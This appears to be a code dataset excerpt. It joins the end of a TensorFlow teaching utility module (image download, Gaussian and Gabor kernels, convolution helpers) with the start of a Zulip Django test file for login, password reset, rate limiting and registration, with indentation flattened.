if not os.path.exists(dst):
os.mkdir(dst)
# Now perform the following 100 times:
for img_i in range(1, max_images + 1):
# create a string using the current loop counter
f = '000%03d.jpg' % img_i
if not os.path.exists(os.path.join(dst, f)):
# and get the url with that string appended the end
url = 'https://s3.amazonaws.com/cadl/celeb-align/' + f
# We'll print this out to the console so we can see how far we've gone
print(url, end='\r')
# And now download the url to a location inside our new directory
urllib.request.urlretrieve(url, os.path.join(dst, f))
files = [os.path.join(dst, file_i)
for file_i in os.listdir(dst)
if '.jpg' in file_i][:max_images]
return files
def get_celeb_imgs(max_images=100):
"""Load the first `max_images` images of the celeb dataset.
Returns
-------
imgs : list of np.ndarray
List of the first 100 images from the celeb dataset
"""
return [plt.imread(f_i) for f_i in get_celeb_files(max_images=max_images)]
def gauss(mean, stddev, ksize):
"""Use Tensorflow to compute a Gaussian Kernel.
Parameters
----------
mean : float
Mean of the Gaussian (e.g. 0.0).
stddev : float
Standard Deviation of the Gaussian (e.g. 1.0).
ksize : int
Size of kernel (e.g. 16).
Returns
-------
kernel : np.ndarray
Computed Gaussian Kernel using Tensorflow.
"""
g = tf.Graph()
with tf.Session(graph=g):
x = tf.linspace(-3.0, 3.0, ksize)
z = (tf.exp(tf.negative(tf.pow(x - mean, 2.0) /
(2.0 * tf.pow(stddev, 2.0)))) *
(1.0 / (stddev * tf.sqrt(2.0 * 3.1415))))
return z.eval()
def gauss2d(mean, stddev, ksize):
"""Use Tensorflow to compute a 2D Gaussian Kernel.
Parameters
----------
mean : float
Mean of the Gaussian (e.g. 0.0).
stddev : float
Standard Deviation of the Gaussian (e.g. 1.0).
ksize : int
Size of kernel (e.g. 16).
Returns
-------
kernel : np.ndarray
Computed 2D Gaussian Kernel using Tensorflow.
"""
z = gauss(mean, stddev, ksize)
g = tf.Graph()
with tf.Session(graph=g):
z_2d = tf.matmul(tf.reshape(z, [ksize, 1]), tf.reshape(z, [1, ksize]))
return z_2d.eval()
def convolve(img, kernel):
"""Use Tensorflow to convolve a 4D image with a 4D kernel.
Parameters
----------
img : np.ndarray
4-dimensional image shaped N x H x W x C
kernel : np.ndarray
4-dimensional image shape K_H, K_W, C_I, C_O corresponding to the
kernel's height and width, the number of input channels, and the
number of output channels. Note that C_I should = C.
Returns
-------
result : np.ndarray
Convolved result.
"""
g = tf.Graph()
with tf.Session(graph=g):
convolved = tf.nn.conv2d(img, kernel, strides=[1, 1, 1, 1], padding='SAME')
res = convolved.eval()
return res
def gabor(ksize=32):
"""Use Tensorflow to compute a 2D Gabor Kernel.
Parameters
----------
ksize : int, optional
Size of kernel.
Returns
-------
gabor : np.ndarray
Gabor kernel with ksize x ksize dimensions.
"""
g = tf.Graph()
with tf.Session(graph=g):
z_2d = gauss2d(0.0, 1.0, ksize)
ones = tf.ones((1, ksize))
ys = tf.sin(tf.linspace(-3.0, 3.0, ksize))
ys = tf.reshape(ys, [ksize, 1])
wave = tf.matmul(ys, ones)
gabor = tf.multiply(wave, z_2d)
return gabor.eval()
def build_submission(filename, file_list, optional_file_list=()):
"""Helper utility to check homework assignment submissions and package them.
Parameters
----------
filename : str
Output zip file name
file_list : tuple
Tuple of files to include
"""
# check each file exists
for part_i, file_i in enumerate(file_list):
if not os.path.exists(file_i):
print('\nYou are missing the file {}. '.format(file_i) +
'It does not look like you have completed Part {}.'.format(
part_i + 1))
def zipdir(path, zf):
for root, dirs, files in os.walk(path):
for file in files:
# make sure the files are part of the necessary file list
if file.endswith(file_list) or file.endswith(optional_file_list):
zf.write(os.path.join(root, file))
# create a zip file with the necessary files
zipf = zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED)
zipdir('.', zipf)
zipf.close()
print('Your assignment zip file has been created!')
print('Now submit the file:\n{}\nto Kadenze for grading!'.format(
os.path.abspath(filename)))
def normalize(a, s=0.1):
'''Normalize the image range for visualization'''
return np.uint8(np.clip(
(a - a.mean()) / max(a.std(), 1e-4) * s + 0.5,
0, 1) * 255)
# %%
def weight_variable(shape, **kwargs):
'''Helper function to create a weight variable initialized with
a normal distribution
Parameters
----------
shape : list
Size of weight variable
'''
if isinstance(shape, list):
initial = tf.random_normal(tf.stack(shape), mean=0.0, stddev=0.01)
initial.set_shape(shape)
else:
initial = tf.random_normal(shape, mean=0.0, stddev=0.01)
return tf.Variable(initial, **kwargs)
# %%
def bias_variable(shape, **kwargs):
'''Helper function to create a bias variable initialized with
a constant value.
Parameters
----------
shape : list
Size of weight variable
'''
if isinstance(shape, list):
initial = tf.random_normal(tf.stack(shape), mean=0.0, stddev=0.01)
initial.set_shape(shape)
else:
initial = tf.random_normal(shape, mean=0.0, stddev=0.01)
return tf.Variable(initial, **kwargs)
def binary_cross_entropy(z, x, name=None):
"""Binary Cross Entropy measures cross entropy of a binary variable.
loss(x, z) = - sum_i (x[i] * log(z[i]) + (1 - x[i]) * log(1 - z[i]))
Parameters
----------
z : tf.Tensor
A `Tensor` of the same type and shape as `x`.
x : tf.Tensor
A `Tensor` of type `float32` or `float64`.
"""
with tf.variable_scope(name or 'bce'):
eps = 1e-12
return (-(x * tf.log(z + eps) +
(1. - x) * tf.log(1. - z + eps)))
def conv2d(x, n_output,
k_h=5, k_w=5, d_h=2, d_w=2,
padding='SAME', name='conv2d', reuse=None):
"""Helper for creating a 2d convolution operation.
Parameters
----------
x : tf.Tensor
Input tensor to convolve.
n_output : int
Number of filters.
k_h : int, optional
Kernel height
k_w : int, optional
Kernel width
d_h : int, optional
Height stride
d_w : int, optional
Width stride
padding : str, optional
Padding type: "SAME" or "VALID"
name : str, optional
Variable scope
Returns
-------
op : tf.Tensor
Output of convolution
"""
with tf.variable_scope(name or 'conv2d', reuse=reuse):
W = tf.get_variable(
name='W',
shape=[k_h, k_w, x.get_shape()[-1], n_output],
initializer=tf.contrib.layers.xavier_initializer_conv2d())
conv = tf.nn.conv2d(
name='conv',
input=x,
filter=W,
strides=[1, d_h, d_w, 1],
padding=padding)
b = tf.get_variable(
name='b',
shape=[n_output],
initializer=tf.constant_initializer(0.0))
h = tf.nn.bias_add(
name='h',
value=conv,
bias=b)
return h, W
def deconv2d(x, n_output_h, n_output_w, n_output_ch, n_input_ch=None,
k_h=5, k_w=5, d_h=2, d_w=2,
padding='SAME', name='deconv2d', reuse=None):
"""Deconvolution helper.
Parameters
----------
x : tf.Tensor
Input tensor to convolve.
n_output_h : int
Height of output
n_output_w : int
Width of output
n_output_ch : int
Number of filters.
k_h : int, optional
Kernel height
k_w : int, optional
Kernel width
d_h : int, optional
Height stride
d_w : int, optional
Width stride
padding : str, optional
Padding type: "SAME" or "VALID"
name : str, optional
Variable scope
Returns
-------
op : tf.Tensor
Output of deconvolution
"""
with tf.variable_scope(name or 'deconv2d', reuse=reuse):
W = tf.get_variable(
name='W',
shape=[k_h, k_w, n_output_ch, n_input_ch or x.get_shape()[-1]],
initializer=tf.contrib.layers.xavier_initializer_conv2d())
conv = tf.nn.conv2d_transpose(
name='conv_t',
value=x,
filter=W,
output_shape=tf.stack(
[tf.shape(x)[0], n_output_h, n_output_w, n_output_ch]),
strides=[1, d_h, d_w, 1],
padding=padding)
conv.set_shape([None, n_output_h, n_output_w, n_output_ch])
b = tf.get_variable(
name='b',
shape=[n_output_ch],
initializer=tf.constant_initializer(0.0))
h = tf.nn.bias_add(name='h', value=conv, bias=b)
return h, W
def lrelu(features, leak=0.2):
"""Leaky rectifier.
Parameters
----------
features : tf.Tensor
Input to apply leaky rectifier to.
leak : float, optional
Percentage of leak.
Returns
-------
op : tf.Tensor
Resulting output of applying leaky rectifier activation.
"""
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * features + f2 * abs(features)
def linear(x, n_output, name=None, activation=None, reuse=None):
"""Fully connected layer.
Parameters
----------
x : tf.Tensor
Input tensor to connect
n_output : int
Number of output neurons
name : None, optional
Scope to apply
Returns
-------
h, W : tf.Tensor, tf.Tensor
Output of fully connected layer and the weight matrix
"""
if len(x.get_shape()) != 2:
x = flatten(x, reuse=reuse)
n_input = x.get_shape().as_list()[1]
with tf.variable_scope(name or "fc", reuse=reuse):
W = tf.get_variable(
name='W',
shape=[n_input, n_output],
dtype=tf.float32,
initializer=tf.contrib.layers.xavier_initializer())
b = tf.get_variable(
name='b',
shape=[n_output],
dtype=tf.float32,
initializer=tf.constant_initializer(0.0))
h = tf.nn.bias_add(
name='h',
value=tf.matmul(x, W),
bias=b)
if activation:
h = activation(h)
return h, W
def flatten(x, name=None, reuse=None):
"""Flatten Tensor to 2-dimensions.
Parameters
----------
x : tf.Tensor
Input tensor to flatten.
name : None, optional
Variable scope for flatten operations
Returns
-------
flattened : tf.Tensor
Flattened tensor.
"""
with tf.variable_scope('flatten'):
dims = x.get_shape().as_list()
if len(dims) == 4:
flattened = tf.reshape(
x,
shape=[-1, dims[1] * dims[2] * dims[3]])
elif len(dims) == 2 or len(dims) == 1:
flattened = x
else:
raise ValueError('Expected n dimensions of 1, 2 or 4. Found:',
len(dims))
return flattened
def to_tensor(x):
"""Convert 2 dim Tensor to a 4 dim Tensor ready for convolution.
Performs the opposite of flatten(x). If the tensor is already 4-D, this
returns the same as the input, leaving it unchanged.
Parameters
----------
x : tf.Tesnor
Input 2-D tensor. If 4-D already, left unchanged.
Returns
-------
x : tf.Tensor
4-D representation of the input.
Raises
------
ValueError
If the tensor is not 2D or already 4D.
"""
if len(x.get_shape()) == 2:
n_input = x.get_shape().as_list()[1]
x_dim = np.sqrt(n_input)
if x_dim == int(x_dim):
x_dim = int(x_dim)
x_tensor = tf.reshape(
x, [-1, x_dim, x_dim, 1], name='reshape')
elif np.sqrt(n_input / 3) == int(np.sqrt(n_input / 3)):
x_dim = int(np.sqrt(n_input / 3))
x_tensor = tf.reshape(
x, [-1, x_dim, x_dim, 3], name='reshape')
else:
x_tensor = tf.reshape(
x, [-1, 1, 1, n_input], name='reshape')
elif len(x.get_shape()) == 4:
x_tensor = x
else:
raise ValueError('Unsupported input dimensions')
return x_tensor
| niazangels/CADL | session-5/libs/utils.py | Python | apache-2.0 | 21,027 | [
"Gaussian"
] | e54985b4885462a6e89e117fc67d79afcb8309f20b87ab57ade4a1bd646955e0 |
import datetime
import re
import smtplib
import time
import urllib
from typing import Any, List, Optional, Sequence
from unittest.mock import MagicMock, patch
import ujson
from django.conf import settings
from django.contrib.auth.views import INTERNAL_RESET_URL_TOKEN
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.http import HttpResponse
from django.test import TestCase, override_settings
from django.urls import reverse
from django.utils.timezone import now as timezone_now
from confirmation import settings as confirmation_settings
from confirmation.models import (
Confirmation,
ConfirmationKeyException,
MultiuseInvite,
confirmation_url,
create_confirmation_link,
generate_key,
get_object_from_key,
one_click_unsubscribe_link,
)
from zerver.context_processors import common_context
from zerver.decorator import do_two_factor_login
from zerver.forms import HomepageForm, check_subdomain_available
from zerver.lib.actions import (
add_new_user_history,
do_add_default_stream,
do_change_full_name,
do_change_user_role,
do_create_default_stream_group,
do_create_realm,
do_create_user,
do_deactivate_realm,
do_deactivate_user,
do_get_user_invites,
do_invite_users,
do_set_realm_property,
get_default_streams_for_realm,
get_stream,
)
from zerver.lib.email_notifications import enqueue_welcome_emails, followup_day2_email_delay
from zerver.lib.initial_password import initial_password
from zerver.lib.mobile_auth_otp import (
ascii_to_hex,
hex_to_ascii,
is_valid_otp,
otp_decrypt_api_key,
otp_encrypt_api_key,
xor_hex_strings,
)
from zerver.lib.name_restrictions import is_disposable_domain
from zerver.lib.rate_limiter import add_ratelimit_rule, remove_ratelimit_rule
from zerver.lib.send_email import FromAddress, deliver_email, send_future_email
from zerver.lib.stream_subscription import get_stream_subscriptions_for_user
from zerver.lib.streams import create_stream_if_needed
from zerver.lib.subdomains import is_root_domain_available
from zerver.lib.test_classes import ZulipTestCase
from zerver.lib.test_helpers import (
avatar_disk_path,
find_key_by_email,
get_test_image_file,
load_subdomain_token,
queries_captured,
reset_emails_in_zulip_realm,
)
from zerver.models import (
CustomProfileField,
CustomProfileFieldValue,
DefaultStream,
Message,
PreregistrationUser,
Realm,
Recipient,
ScheduledEmail,
Stream,
Subscription,
UserMessage,
UserProfile,
flush_per_request_caches,
get_realm,
get_system_bot,
get_user,
get_user_by_delivery_email,
)
from zerver.views.auth import redirect_and_log_into_subdomain, start_two_factor_auth
from zerver.views.development.registration import confirmation_key
from zerver.views.invite import get_invitee_emails_set
from zproject.backends import ExternalAuthDataDict, ExternalAuthResult
class RedirectAndLogIntoSubdomainTestCase(ZulipTestCase):
def test_data(self) -> None:
realm = get_realm("zulip")
user_profile = self.example_user("hamlet")
name = user_profile.full_name
email = user_profile.delivery_email
response = redirect_and_log_into_subdomain(ExternalAuthResult(user_profile=user_profile))
data = load_subdomain_token(response)
self.assertDictEqual(data, {'full_name': name,
'email': email,
'subdomain': realm.subdomain,
'is_signup': False})
data_dict = ExternalAuthDataDict(is_signup=True, multiuse_object_key='key')
response = redirect_and_log_into_subdomain(ExternalAuthResult(user_profile=user_profile,
data_dict=data_dict))
data = load_subdomain_token(response)
self.assertDictEqual(data, {'full_name': name,
'email': email,
'subdomain': realm.subdomain,
# the email has an account at the subdomain,
# so is_signup get overridden to False:
'is_signup': False,
'multiuse_object_key': 'key',
})
data_dict = ExternalAuthDataDict(email=self.nonreg_email("alice"),
full_name="Alice",
subdomain=realm.subdomain,
is_signup=True,
full_name_validated=True,
multiuse_object_key='key')
response = redirect_and_log_into_subdomain(ExternalAuthResult(data_dict=data_dict))
data = load_subdomain_token(response)
self.assertDictEqual(data, {'full_name': "Alice",
'email': self.nonreg_email("alice"),
'full_name_validated': True,
'subdomain': realm.subdomain,
'is_signup': True,
'multiuse_object_key': 'key',
})
class DeactivationNoticeTestCase(ZulipTestCase):
def test_redirection_for_deactivated_realm(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
for url in ('/register/', '/login/'):
result = self.client_get(url)
self.assertEqual(result.status_code, 302)
self.assertIn('deactivated', result.url)
def test_redirection_for_active_realm(self) -> None:
for url in ('/register/', '/login/'):
result = self.client_get(url)
self.assertEqual(result.status_code, 200)
def test_deactivation_notice_when_realm_is_active(self) -> None:
result = self.client_get('/accounts/deactivated/')
self.assertEqual(result.status_code, 302)
self.assertIn('login', result.url)
def test_deactivation_notice_when_deactivated(self) -> None:
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_get('/accounts/deactivated/')
self.assertIn("Zulip Dev, has been deactivated.", result.content.decode())
class AddNewUserHistoryTest(ZulipTestCase):
def test_add_new_user_history_race(self) -> None:
"""Sends a message during user creation"""
# Create a user who hasn't had historical messages added
realm = get_realm('zulip')
stream = Stream.objects.get(realm=realm, name='Denmark')
DefaultStream.objects.create(stream=stream, realm=realm)
# Make sure at least 3 messages are sent to Denmark and it's a default stream.
message_id = self.send_stream_message(self.example_user('hamlet'), stream.name, "test 1")
self.send_stream_message(self.example_user('hamlet'), stream.name, "test 2")
self.send_stream_message(self.example_user('hamlet'), stream.name, "test 3")
with patch("zerver.lib.actions.add_new_user_history"):
self.register(self.nonreg_email('test'), "test")
user_profile = self.nonreg_user('test')
subs = Subscription.objects.select_related("recipient").filter(
user_profile=user_profile, recipient__type=Recipient.STREAM)
streams = Stream.objects.filter(id__in=[sub.recipient.type_id for sub in subs])
# Sent a message afterwards to trigger a race between message
# sending and `add_new_user_history`.
race_message_id = self.send_stream_message(self.example_user('hamlet'),
streams[0].name, "test")
# Overwrite ONBOARDING_UNREAD_MESSAGES to 2
ONBOARDING_UNREAD_MESSAGES = 2
with patch("zerver.lib.actions.ONBOARDING_UNREAD_MESSAGES",
ONBOARDING_UNREAD_MESSAGES):
add_new_user_history(user_profile, streams)
# Our first message is in the user's history
self.assertTrue(UserMessage.objects.filter(user_profile=user_profile,
message_id=message_id).exists())
# The race message is in the user's history and marked unread.
self.assertTrue(UserMessage.objects.filter(user_profile=user_profile,
message_id=race_message_id).exists())
self.assertFalse(UserMessage.objects.get(user_profile=user_profile,
message_id=race_message_id).flags.read.is_set)
# Verify that the ONBOARDING_UNREAD_MESSAGES latest messages
# that weren't the race message are marked as unread.
latest_messages = UserMessage.objects.filter(
user_profile=user_profile,
message__recipient__type=Recipient.STREAM,
).exclude(message_id=race_message_id).order_by('-message_id')[0:ONBOARDING_UNREAD_MESSAGES]
self.assertEqual(len(latest_messages), 2)
for msg in latest_messages:
self.assertFalse(msg.flags.read.is_set)
# Verify that older messages are correctly marked as read.
older_messages = UserMessage.objects.filter(
user_profile=user_profile,
message__recipient__type=Recipient.STREAM,
).exclude(message_id=race_message_id).order_by(
'-message_id')[ONBOARDING_UNREAD_MESSAGES:ONBOARDING_UNREAD_MESSAGES + 1]
self.assertTrue(len(older_messages) > 0)
for msg in older_messages:
self.assertTrue(msg.flags.read.is_set)
class InitialPasswordTest(ZulipTestCase):
def test_none_initial_password_salt(self) -> None:
with self.settings(INITIAL_PASSWORD_SALT=None):
self.assertIsNone(initial_password('test@test.com'))
class PasswordResetTest(ZulipTestCase):
"""
Log in, reset password, log out, log in with new password.
"""
def get_reset_mail_body(self) -> str:
from django.core.mail import outbox
[message] = outbox
self.assertRegex(
message.from_email,
fr"^Zulip Account Security <{self.TOKENIZED_NOREPLY_REGEX}>\Z",
)
return message.body
def test_password_reset(self) -> None:
user = self.example_user("hamlet")
email = user.delivery_email
old_password = initial_password(email)
self.login_user(user)
# test password reset template
result = self.client_get('/accounts/password/reset/')
self.assert_in_response('Reset your password', result)
# start the password reset process by supplying an email address
result = self.client_post('/accounts/password/reset/', {'email': email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
# Check that the password reset email is from a noreply address.
body = self.get_reset_mail_body()
self.assertIn("reset your password", body)
# Visit the password reset link.
password_reset_url = self.get_confirmation_url_from_outbox(
email, url_pattern=settings.EXTERNAL_HOST + r"(\S\S+)")
result = self.client_get(password_reset_url)
self.assertEqual(result.status_code, 302)
self.assertTrue(result.url.endswith(f'/{INTERNAL_RESET_URL_TOKEN}/'))
final_reset_url = result.url
result = self.client_get(final_reset_url)
self.assertEqual(result.status_code, 200)
# Reset your password
with self.settings(PASSWORD_MIN_LENGTH=3, PASSWORD_MIN_GUESSES=1000):
# Verify weak passwords don't work.
result = self.client_post(final_reset_url,
{'new_password1': 'easy',
'new_password2': 'easy'})
self.assert_in_response("The password is too weak.",
result)
result = self.client_post(final_reset_url,
{'new_password1': 'f657gdGGk9',
'new_password2': 'f657gdGGk9'})
# password reset succeeded
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith("/password/done/"))
# log back in with new password
self.login_by_email(email, password='f657gdGGk9')
user_profile = self.example_user('hamlet')
self.assert_logged_in_user_id(user_profile.id)
# make sure old password no longer works
self.assert_login_failure(email, password=old_password)
def test_password_reset_for_non_existent_user(self) -> None:
email = 'nonexisting@mars.com'
# start the password reset process by supplying an email address
result = self.client_post('/accounts/password/reset/', {'email': email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
# Check that the password reset email is from a noreply address.
body = self.get_reset_mail_body()
self.assertIn('Somebody (possibly you) requested a new password', body)
self.assertIn('You do not have an account', body)
self.assertIn('safely ignore', body)
self.assertNotIn('reset your password', body)
self.assertNotIn('deactivated', body)
def test_password_reset_for_deactivated_user(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
do_deactivate_user(user_profile)
# start the password reset process by supplying an email address
result = self.client_post('/accounts/password/reset/', {'email': email})
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
# Check that the password reset email is from a noreply address.
body = self.get_reset_mail_body()
self.assertIn('Somebody (possibly you) requested a new password', body)
self.assertIn('has been deactivated', body)
self.assertIn('safely ignore', body)
self.assertNotIn('reset your password', body)
self.assertNotIn('not have an account', body)
def test_password_reset_with_deactivated_realm(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
do_deactivate_realm(user_profile.realm)
# start the password reset process by supplying an email address
with patch('logging.info') as mock_logging:
result = self.client_post('/accounts/password/reset/', {'email': email})
mock_logging.assert_called_once()
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
# Check that the password reset email is from a noreply address.
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
@override_settings(RATE_LIMITING=True)
def test_rate_limiting(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
from django.core.mail import outbox
add_ratelimit_rule(10, 2, domain='password_reset_form_by_email')
start_time = time.time()
with patch('time.time', return_value=start_time):
self.client_post('/accounts/password/reset/', {'email': email})
self.client_post('/accounts/password/reset/', {'email': email})
self.assert_length(outbox, 2)
# Too many password reset emails sent to the address, we won't send more.
self.client_post('/accounts/password/reset/', {'email': email})
self.assert_length(outbox, 2)
# Resetting for a different address works though.
self.client_post('/accounts/password/reset/', {'email': self.example_email("othello")})
self.assert_length(outbox, 3)
self.client_post('/accounts/password/reset/', {'email': self.example_email("othello")})
self.assert_length(outbox, 4)
# After time, password reset emails can be sent again.
with patch('time.time', return_value=start_time + 11):
self.client_post('/accounts/password/reset/', {'email': email})
self.client_post('/accounts/password/reset/', {'email': email})
self.assert_length(outbox, 6)
remove_ratelimit_rule(10, 2, domain='password_reset_form_by_email')
def test_wrong_subdomain(self) -> None:
email = self.example_email("hamlet")
# start the password reset process by supplying an email address
result = self.client_post(
'/accounts/password/reset/', {'email': email},
subdomain="zephyr")
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
body = self.get_reset_mail_body()
self.assertIn('Somebody (possibly you) requested a new password', body)
self.assertIn('You do not have an account', body)
self.assertIn("active accounts in the following organization(s).\nhttp://zulip.testserver",
body)
self.assertIn('safely ignore', body)
self.assertNotIn('reset your password', body)
self.assertNotIn('deactivated', body)
def test_invalid_subdomain(self) -> None:
email = self.example_email("hamlet")
# start the password reset process by supplying an email address
result = self.client_post(
'/accounts/password/reset/', {'email': email},
subdomain="invalid")
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 404)
self.assert_in_response("There is no Zulip organization hosted at this subdomain.",
result)
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_auth_only(self) -> None:
"""If the email auth backend is not enabled, password reset should do nothing"""
email = self.example_email("hamlet")
with patch('logging.info') as mock_logging:
result = self.client_post('/accounts/password/reset/', {'email': email})
mock_logging.assert_called_once()
# check the redirect link telling you to check mail for password reset link
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
self.assert_in_response("Check your email in a few minutes to finish the process.", result)
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
'zproject.backends.EmailAuthBackend',
'zproject.backends.ZulipDummyBackend'))
def test_ldap_and_email_auth(self) -> None:
"""If both email and ldap auth backends are enabled, limit password
reset to users outside the LDAP domain"""
# If the domain matches, we don't generate an email
with self.settings(LDAP_APPEND_DOMAIN="zulip.com"):
email = self.example_email("hamlet")
with patch('logging.info') as mock_logging:
result = self.client_post('/accounts/password/reset/', {'email': email})
mock_logging.assert_called_once_with("Password reset not allowed for user in LDAP domain")
from django.core.mail import outbox
self.assertEqual(len(outbox), 0)
# If the domain doesn't match, we do generate an email
with self.settings(LDAP_APPEND_DOMAIN="example.com"):
email = self.example_email("hamlet")
with patch('logging.info') as mock_logging:
result = self.client_post('/accounts/password/reset/', {'email': email})
self.assertEqual(result.status_code, 302)
self.assertTrue(result["Location"].endswith(
"/accounts/password/reset/done/"))
result = self.client_get(result["Location"])
body = self.get_reset_mail_body()
self.assertIn('reset your password', body)
def test_redirect_endpoints(self) -> None:
'''
These tests are mostly designed to give us 100% URL coverage
in our URL coverage reports. Our mechanism for finding URL
coverage doesn't handle redirects, so we just have a few quick
tests here.
'''
result = self.client_get('/accounts/password/reset/done/')
self.assert_in_success_response(["Check your email"], result)
result = self.client_get('/accounts/password/done/')
self.assert_in_success_response(["We've reset your password!"], result)
result = self.client_get('/accounts/send_confirm/alice@example.com')
self.assert_in_success_response(["/accounts/home/"], result)
result = self.client_get('/accounts/new/send_confirm/alice@example.com')
self.assert_in_success_response(["/new/"], result)
class LoginTest(ZulipTestCase):
"""
Logging in, registration, and logging out.
"""
def test_login(self) -> None:
self.login('hamlet')
user_profile = self.example_user('hamlet')
self.assert_logged_in_user_id(user_profile.id)
def test_login_deactivated_user(self) -> None:
user_profile = self.example_user('hamlet')
do_deactivate_user(user_profile)
result = self.login_with_return(self.example_email("hamlet"), "xxx")
self.assertEqual(result.status_code, 200)
self.assert_in_response("Your account is no longer active.", result)
self.assert_logged_in_user_id(None)
def test_login_bad_password(self) -> None:
user = self.example_user("hamlet")
password = "wrongpassword"
result = self.login_with_return(user.delivery_email, password=password)
self.assert_in_success_response([user.delivery_email], result)
self.assert_logged_in_user_id(None)
# Parallel test to confirm that the right password works using the
# same login code, which verifies our failing test isn't broken
# for some other reason.
password = initial_password(user.delivery_email)
result = self.login_with_return(user.delivery_email, password=password)
self.assertEqual(result.status_code, 302)
self.assert_logged_in_user_id(user.id)
@override_settings(RATE_LIMITING_AUTHENTICATE=True)
def test_login_bad_password_rate_limiter(self) -> None:
user_profile = self.example_user("hamlet")
email = user_profile.delivery_email
add_ratelimit_rule(10, 2, domain='authenticate_by_username')
start_time = time.time()
with patch('time.time', return_value=start_time):
self.login_with_return(email, password="wrongpassword")
self.assert_logged_in_user_id(None)
self.login_with_return(email, password="wrongpassword")
self.assert_logged_in_user_id(None)
# We're over the allowed limit, so the next attempt, even with the correct
# password, will get blocked.
result = self.login_with_return(email)
self.assert_in_success_response(["Try again in 10 seconds"], result)
# After time passes, we should be able to log in.
with patch('time.time', return_value=start_time + 11):
self.login_with_return(email)
self.assert_logged_in_user_id(user_profile.id)
remove_ratelimit_rule(10, 2, domain='authenticate_by_username')
def test_login_nonexist_user(self) -> None:
result = self.login_with_return("xxx@zulip.com", "xxx")
self.assertEqual(result.status_code, 200)
self.assert_in_response("Please enter a correct email and password", result)
self.assert_logged_in_user_id(None)
def test_login_wrong_subdomain(self) -> None:
with patch("logging.warning") as mock_warning:
result = self.login_with_return(self.mit_email("sipbtest"), "xxx")
mock_warning.assert_called_once()
self.assertEqual(result.status_code, 200)
self.assert_in_response("Your Zulip account is not a member of the "
"organization associated with this subdomain.", result)
self.assert_logged_in_user_id(None)
def test_login_invalid_subdomain(self) -> None:
result = self.login_with_return(self.example_email("hamlet"), "xxx",
subdomain="invalid")
self.assertEqual(result.status_code, 404)
self.assert_in_response("There is no Zulip organization hosted at this subdomain.", result)
self.assert_logged_in_user_id(None)
def test_register(self) -> None:
reset_emails_in_zulip_realm()
realm = get_realm("zulip")
stream_names = [f"stream_{i}" for i in range(40)]
for stream_name in stream_names:
stream = self.make_stream(stream_name, realm=realm)
DefaultStream.objects.create(stream=stream, realm=realm)
# Clear all the caches.
flush_per_request_caches()
ContentType.objects.clear_cache()
with queries_captured() as queries:
self.register(self.nonreg_email('test'), "test")
# Ensure the number of queries we make is not O(streams)
self.assertEqual(len(queries), 78)
user_profile = self.nonreg_user('test')
self.assert_logged_in_user_id(user_profile.id)
self.assertFalse(user_profile.enable_stream_desktop_notifications)
def test_register_deactivated(self) -> None:
"""
If you try to register for a deactivated realm, you get a clear error
page.
"""
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.client_post('/accounts/home/', {'email': self.nonreg_email('test')},
subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual('/accounts/deactivated/', result.url)
with self.assertRaises(UserProfile.DoesNotExist):
self.nonreg_user('test')
def test_register_deactivated_partway_through(self) -> None:
"""
If you try to register for a deactivated realm, you get a clear error
page.
"""
email = self.nonreg_email('test')
result = self.client_post('/accounts/home/', {'email': email},
subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertNotIn('deactivated', result.url)
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.submit_reg_form_for_user(email, "abcd1234", subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual('/accounts/deactivated/', result.url)
with self.assertRaises(UserProfile.DoesNotExist):
self.nonreg_user('test')
def test_login_deactivated_realm(self) -> None:
"""
If you try to log in to a deactivated realm, you get a clear error page.
"""
realm = get_realm("zulip")
realm.deactivated = True
realm.save(update_fields=["deactivated"])
result = self.login_with_return(self.example_email("hamlet"), subdomain="zulip")
self.assertEqual(result.status_code, 302)
self.assertEqual('/accounts/deactivated/', result.url)
def test_logout(self) -> None:
self.login('hamlet')
# We use the logout API, not self.logout, to make sure we test
# the actual logout code path.
self.client_post('/accounts/logout/')
self.assert_logged_in_user_id(None)
